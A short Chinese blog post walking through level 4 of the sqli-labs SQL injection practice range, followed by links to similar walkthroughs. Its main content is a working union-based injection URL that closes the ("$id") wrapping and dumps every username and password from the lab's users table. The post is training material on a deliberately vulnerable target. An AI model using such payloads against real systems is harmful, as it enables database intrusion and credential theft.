AI 助理
备案控制台
开发者社区 安全 文章 正文

【less-4】sqli-labs靶场第四关

2024-06-18 45
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 【less-4】sqli-labs靶场第四关

网址



解法

与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关

不同的是,根据错误回显知道,其拼接方式为id=("$id")


故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1")

采用如下语句获取所有用户名和密码

https://sqli.wmcoder.site/sqli-labs/Less-4/?id=1") and 1=2 union select 1,group_concat(username), group_concat(password) from security.users --+



文章标签:
数据安全/隐私保护
游客h2vchmlwqitbk
目录
相关文章
GG2020gg
|
4月前
|
SQL 安全 数据库
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
GG2020gg
801 1
游客h2vchmlwqitbk
|
7月前
|
SQL 安全 关系型数据库
【less-2】sqli-labs靶场第二关
【less-2】sqli-labs靶场第二关
游客h2vchmlwqitbk
148 0
不拿flag不改名
|
8月前
|
安全 数据库
sqli-labs---第五关
sqli-labs---第五关
不拿flag不改名
85 1
不拿flag不改名
|
8月前
|
安全 数据库 数据安全/隐私保护
sqli-labs---第四关
sqli-labs---第四关
不拿flag不改名
70 1
游客h2vchmlwqitbk
|
7月前
|
数据安全/隐私保护
【less-3】sqli-labs靶场第三关
【less-3】sqli-labs靶场第三关
游客h2vchmlwqitbk
54 0
XError_xiaoyu
|
8月前
|
SQL PHP 数据库
Sqli-labs靶场搭建
本文章是在自己在使用新版phpstudy搭建靶场过程中遇到了很多问题,但在查询无果后,决定尝试旧版的phpstudy看能否成功,很幸运,成功了,也并不是网上的教程,说是php必须在5.2及以下.我使用的是5.4版本的.是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养
XError_xiaoyu
133 1
不拿flag不改名
|
8月前
|
安全 数据库
sqli-labs---第二关
sqli-labs---第二关
不拿flag不改名
47 0
sumith
|
8月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
sumith
50 1
士别三日wyx
|
SQL 数据库
SQLi LABS Less-26a
第26a关使用GET请求传递参数,在url地址栏中构造payload即可 源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可
士别三日wyx
333 0
SQLi LABS Less-26a
士别三日wyx
|
SQL
SQLi LABS Less-23
第23关使用GET请求传递参数,在url地址栏构造payload即可 此关卡对注释符号进行了过滤,因此不能使用注释符,可以使用单引号闭合,使SQL的语法结构成立
士别三日wyx
160 0
SQLi LABS Less-23